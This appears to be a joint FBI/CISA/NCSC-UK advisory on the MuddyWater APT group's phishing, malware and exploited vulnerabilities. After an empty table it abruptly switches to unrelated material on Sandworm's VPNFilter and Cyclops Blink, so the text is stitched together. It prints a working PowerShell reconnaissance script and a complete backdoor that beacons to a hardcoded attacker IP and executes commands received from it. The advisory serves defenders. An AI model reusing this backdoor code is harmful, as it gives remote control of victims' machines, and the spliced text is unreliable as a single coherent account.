FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

• A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe. 
• A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
• config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003]. 

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft’s Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., “Microsift”) and Outlook in its filenames associated with Small Sieve [T1036.005].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027], T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.

Canopy

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

• Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.
• Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
• Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
• Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
• Reads and/or writes data from the following Registry Keys, HKLMSoftwareNFCIPA and HKLMSoftwareNFC(Default).

POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools— along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, Virus Total. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

MuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI, CISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of privilege vulnerability (CVE-2020-1472) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known exploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.

Survey Script

The following script is an example of a survey script used by MuddyWater to enumerate information about victim computers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the compromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The produced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.

$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += “;;”;$ips = “”;Get-WmiObject Win32_NetworkAdapterConfiguration -Filter “IPEnabled=True” | % {$ips = $ips + “, ” + $_.IPAddress[0]};$S += $ips.substring(1);$S += “;;”;$S += $O.OSArchitecture;$S += “;;”;$S += [System.Net.DNS]::GetHostByName(”).HostName;$S += “;;”;$S += ((Get-WmiObject Win32_ComputerSystem).Domain);$S += “;;”;$S += $env:UserName;$S += “;;”;$AntiVirusProducts = Get-WmiObject -Namespace “rootSecurityCenter2” -Class AntiVirusProduct  -ComputerName $env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti += $AntiVirusProduct.displayName};$S += $resAnti;echo $S;

Newly Identified PowerShell Backdoor

The newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to encrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in functionality and uses the InvokeScript method to execute responses received from the adversary.

function encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return $encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w = [System.Net.HttpWebRequest]::Create(‘http://95.181.161.49:80/index.php?id=<victim identifier>’);$w.proxy = [Net.WebRequest]::GetSystemWebProxy();$r=(New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr = [System.Net.HttpWebRequest]::Create(‘http://95.181.161.49:80/index.php?id=<victim identifier>’);$wr.proxy = [Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add(‘cookie’,(encode $res 2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}

MITRE ATT&CK Techniques

MuddyWater uses the ATT&CK techniques listed in table 1.

Table 1: MuddyWater ATT&CK Techniques[2]

VPNFilter

The malware was first exposed in 2018

A series of articles published by Cisco Talos in 2018 describes VPNFilter and its modules in detail. VPNFilter was deployed in stages, with most functionality in the third-stage modules. These modules enabled traffic manipulation, destruction of the infected host device, and likely enabled downstream devices to be exploited. They also allowed monitoring of Modbus SCADA protocols, which appears to be an ongoing requirement for Sandworm, as also seen in their previous attacks against ICS networks.

VPNFilter targeting was widespread and appeared indiscriminate, with some exceptions: Cisco Talos reported an increase of victims in Ukraine in May 2018. Sandworm also deployed VPNFilter against targets in the Republic of Korea before the 2018 Winter Olympics. 

In May 2018, Cisco Talos published the blog that exposed VPNFilter and the U.S. Department of Justice linked the activity to Sandworm and announced efforts to disrupt the botnet.

Activity since its exposure 

A Trendmicro blog in January 2021 detailed residual VPNFilter infections and provided data which showed that although there had been a reduction in requests to a known C2 domain, there was still more than a third of the original number of first-stage infections.

Sandworm has since shown limited interest in existing VPNFilter footholds, instead preferring to retool.

Cyclops Blink

Active since 2019

The NCSC, CISA, the FBI, and NSA, along with industry partners, have now identified a large-scale modular malware framework (T1129) which is targeting network devices. The new malware is referred to here as Cyclops Blink and has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread.

The actor has so far primarily deployed Cyclops Blink to WatchGuard devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

Note: Note that only WatchGuard devices that were reconfigured from the manufacturer default settings to open remote management interfaces to external access could be infected

Malware overview 

The malware itself is sophisticated and modular with basic core functionality to beacon (T1132.002) device information back to a server and enable files to be downloaded and executed. There is also functionality to add new modules while the malware is running, which allows Sandworm to implement additional capability as required.

The NCSC has published a malware analysis report on Cyclops Blink which provides more detail about the malware.

Post exploitation 

Post exploitation, Cyclops Blink is generally deployed as part of a firmware ‘update’ (T1542.001). This achieves persistence when the device is rebooted and makes remediation harder.

Victim devices are organized into clusters and each deployment of Cyclops Blink has a list of command and control (C2) IP addresses and ports that it uses (T1008). All the known C2 IP addresses to date have been used by compromised WatchGuard firewall devices. Communications between Cyclops Blink clients and servers are protected under Transport Layer Security (TLS) (T1071.001), using individually generated keys and certificates. Sandworm manages Cyclops Blink by connecting to the C2 layer through the Tor network.